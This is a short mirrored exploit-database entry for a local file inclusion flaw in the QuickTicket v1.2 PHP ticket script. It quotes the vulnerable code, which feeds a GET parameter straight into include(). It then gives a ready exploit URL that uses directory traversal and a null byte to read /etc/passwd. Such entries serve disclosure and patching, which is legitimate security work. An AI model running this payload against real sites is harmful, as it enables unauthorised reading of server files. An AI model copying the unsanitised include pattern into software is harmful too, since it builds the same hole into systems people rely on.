exploit-db-mirror/exploits/php/webapps/4116.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

16 lines
No EOL
396 B
Text

###QuickTicket v1.2 Local File Inclusion###
#download: http://www.qt-cute.org/download/qti12.zip
#found by: katatafish (karatatata@hush.com)
#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");
#exploit:
http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
#thanks:str0ke
# milw0rm.com [2007-06-27]